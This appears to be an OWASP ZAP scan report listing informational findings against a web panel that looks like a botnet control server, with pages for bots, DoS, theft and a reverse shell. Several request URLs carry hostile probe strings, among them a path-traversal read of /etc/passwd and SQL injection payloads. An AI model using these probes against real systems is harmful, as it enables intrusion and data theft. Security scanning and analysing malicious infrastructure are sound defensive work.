Evidence <script> var dashboard = document.getElementById("dashboard"); var bots = document.getElementById("bots"); var dos = document.getElementById("dos"); var theft = document.getElementById("theft"); var settings = document.getElementById("settings"); var tasks = document.getElementById('tasks'); var watchdog = document.getElementById('watchdog'); var manager = document.getElementById('manager'); function retrieveResult() { var xmlReq = new XMLHttpRequest(); var url = "gate.php?bot=" + "DESKTOP-95IQEEV"; xmlReq.onreadystatechange = function() { if (xmlReq.readyState == 4 && xmlReq.status == 200) { if (xmlReq.responseText.length > 2) { document.getElementById("resultArea").innerHTML = ''; document.getElementById("resultArea").innerHTML = xmlReq.responseText; } } }; xmlReq.open("GET", url, true); xmlReq.send(); setTimeout(retrieveResult, 2000); } retrieveResult(); const userId = 54; const REDIRECT = (page) => { if (userId) { window.location.href = `${page}?id=${userId}`; } else { console.error("User ID not available"); window.location.href = page; } }; dashboard.addEventListener("click", () => { REDIRECT("dashboard.php"); }); tasks.addEventListener("click", () => { REDIRECT("tasks_page.php"); }); watchdog.addEventListener("click", () => { REDIRECT("watchdog.php"); }); manager.addEventListener("click", () => { REDIRECT("manager.php"); }); bots.addEventListener("click", () => { REDIRECT("Bots.php"); }); dos.addEventListener("click", () => { REDIRECT("dos.php"); }); theft.addEventListener("click", () => { REDIRECT("theft.php"); }); settings.addEventListener("click", () => { REDIRECT("settings_page.php"); }); </script>
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
Instances 6
Solution
This is an informational alert and so no changes are required.
Reference
Tags
CWE Id
WASC Id
Plugin Id 10109
Informational
Non-Storable Content
Description
The response contents are not storable by caching components such as proxy servers. If the response does not contain sensitive, personal or user-specific information, it may benefit from being stored and cached, to improve performance.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 626 bytes.
Request Body - size: 0 bytes.
Response Header - size: 241 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Bots.php?id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 718 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 12,091 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/dashboard.php?id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 646 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 17,675 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 741 bytes.
Request Body - size: 0 bytes.
Response Header - size: 366 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?bot=DESKTOP-95IQEEV&value=%271%27%3D1%27&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 790 bytes.
Request Body - size: 0 bytes.
Response Header - size: 365 bytes.
Response Body - size: 7,351 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/reverseShell.php?command=%271%27%3D1%27&bot=DESKTOP-95IQEEV&id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 792 bytes.
Request Body - size: 0 bytes.
Response Header - size: 441 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter
Attack
Evidence 403
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 459 bytes.
Request Body - size: 0 bytes.
Response Header - size: 389 bytes.
Response Body - size: 131 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?customArgs=&dllFunction=&limit=&params=*&task_select=8&unit_EXEC=18.9
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 709 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 543 bytes.
Request Body - size: 0 bytes.
Response Header - size: 367 bytes.
Response Body - size: 14,616 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 468 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54%27%20UNION%20SELECT%20IF(YOUR-CONDITION-HERE,(SELECT%20table_name%20FROM%20information_schema.tables),%27a%27)%20--%20-
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 766 bytes.
Request Body - size: 0 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54&task_select=1&params=%27+UNION+SELECT+%40%40version+--+-&unit_EXEC=18.9&limit=%27+UNION+SELECT+%40%40version+--+-&dllFunction=&customArgs=
Method GET
Parameter
Attack
Evidence no-store
Request Header - size: 972 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 808 bytes.
Request Body - size: 113 bytes.
Response Header - size: 513 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 479 bytes.
Request Body - size: 0 bytes.
Response Header - size: 370 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/tasks_page.php?id=54
Method POST
Parameter
Attack
Evidence no-store
Request Header - size: 647 bytes.
Request Body - size: 69 bytes.
Response Header - size: 363 bytes.
Response Body - size: 0 bytes.
Instances 25
Solution
The content may be marked as storable by ensuring that the following conditions are satisfied:

The request method must be understood by the cache and defined as being cacheable ("GET", "HEAD", and "POST" are currently defined as cacheable)

The response status code must be understood by the cache (one of the 1XX, 2XX, 3XX, 4XX, or 5XX response classes are generally understood)

The "no-store" cache directive must not appear in the request or response header fields

For caching by "shared" caches such as "proxy" caches, the "private" response directive must not appear in the response

For caching by "shared" caches such as "proxy" caches, the "Authorization" header field must not appear in the request, unless the response explicitly allows it (using one of the "must-revalidate", "public", or "s-maxage" Cache-Control response directives)

In addition to the conditions above, at least one of the following conditions must also be satisfied by the response:

It must contain an "Expires" header field

It must contain a "max-age" response directive

For "shared" caches such as "proxy" caches, it must contain a "s-maxage" response directive

It must contain a "Cache Control Extension" that allows it to be cached

It must have a status code that is defined as cacheable by default (200, 203, 204, 206, 300, 301, 404, 405, 410, 414, 501).
Reference https://datatracker.ietf.org/doc/html/rfc7234
https://datatracker.ietf.org/doc/html/rfc7231
https://www.w3.org/Protocols/rfc2616/rfc2616-sec13.html
Tags WSTG-v42-ATHN-06
CWE Id 524
WASC Id 13
Plugin Id 10049
Informational
Possible Username Enumeration
Description
It may be possible to enumerate usernames, based on differing HTTP responses when valid and invalid usernames are provided. This would greatly increase the probability of success of password brute-forcing attacks against the system. Note that false positives may sometimes be minimised by increasing the 'Attack Strength' Option in ZAP. Please manually check the 'Other Info' field to confirm if this is actually an issue.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter password
Attack Manipulate [form] field: [password] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter PHPSESSID
Attack Manipulate [cookie] field: [PHPSESSID] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter secret
Attack Manipulate [form] field: [secret] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter username
Attack Manipulate [form] field: [username] and monitor the output
Evidence
Request Header - size: 1,061 bytes.
Request Body - size: 208 bytes.
Response Header - size: 252 bytes.
Response Body - size: 0 bytes.
Instances 4
Solution
Do not divulge details of whether a username is valid or invalid. In particular, for unsuccessful login attempts, do not differentiate between an invalid user and an invalid password in the error message, page title, page contents, HTTP headers, or redirection logic.
Reference https://owasp.org/www-project-web-security-testing-guide/v41/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html
http://sebastian-schinzel.de/_download/ifip-sec2011.pdf
Tags OWASP_2021_A05
OWASP_2017_A06
WSTG-v42-IDNT-04
CWE Id 200
WASC Id 13
Plugin Id 40023
Informational
Sec-Fetch-Dest Header is Missing
Description
Specifies how and where the data would be used. For instance, if the value is audio, then the requested resource must be audio data and not any other type of resource.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=M;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=N;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=A
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=S;O=D
Method GET
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 257 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 247 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 603 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method POST
Parameter Sec-Fetch-Dest
Attack
Evidence
Request Header - size: 533 bytes.
Request Body - size: 33 bytes.
Response Header - size: 197 bytes.
Response Body - size: 0 bytes.
Instances 38
Solution
Ensure that Sec-Fetch-Dest header is included in request headers.
Reference https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Sec-Fetch-Dest
Tags WSTG-v42-SESS-05
CWE Id 352
WASC Id 9
Plugin Id 90005
Informational
Sec-Fetch-Mode Header is Missing
Description
Allows to differentiate between requests for navigating between HTML pages and requests for loading resources like images, audio etc.
URL http://142.202.242.172
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 148 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 149 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=D;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=M;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=N;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/?C=S;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 199 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 790 bytes.
URL http://142.202.242.172/robots.txt
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 159 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/sitemap.xml
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 160 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 301 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 165 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Capture.PNG
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 152 bytes.
Request Body - size: 0 bytes.
Response Header - size: 275 bytes.
Response Body - size: 27,382 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 175 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/3jl1j?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 301 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Capture.PNG
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 379 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 197 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qi/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 393 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php/327qifoo.php?file=../../../../../../../etc/passwd
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 290 bytes.
Request Body - size: 0 bytes.
Response Header - size: 314 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?key=EWREWTRUTHEWUFIUEWJFEWJFWEIUFHE324325473524632EFJWIFJWOJFIEWJOFJOWEFYEWFYUWEUFTUYEWTFUYEWTFUYEWOWEKPFOPWEPFKW
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 289 bytes.
Request Body - size: 0 bytes.
Response Header - size: 200 bytes.
Response Body - size: 3,435 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/login.php?password=ZAP&secret=&username=ZAP
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 209 bytes.
Request Body - size: 0 bytes.
Response Header - size: 372 bytes.
Response Body - size: 0 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 181 bytes.
Request Body - size: 0 bytes.
Response Header - size: 185 bytes.
Response Body - size: 304 bytes.
URL http://142.202.242.172/TQUIA729JAULAMJS/Sound%20Effects/error.wav
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 191 bytes.
Request Body - size: 0 bytes.
Response Header - size: 259 bytes.
Response Body - size: 97,496 bytes.
URL http://142.202.242.172/xampp
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 194 bytes.
Request Body - size: 0 bytes.
Response Header - size: 234 bytes.
Response Body - size: 342 bytes.
URL http://142.202.242.172/xampp/
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 189 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=A
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 203 bytes.
Request Body - size: 0 bytes.
Response Header - size: 172 bytes.
Response Body - size: 773 bytes.
URL http://142.202.242.172/xampp/?C=D;O=D
Method GET
Parameter Sec-Fetch-Mode
Attack
Evidence
Request Header - size: 257 bytes.
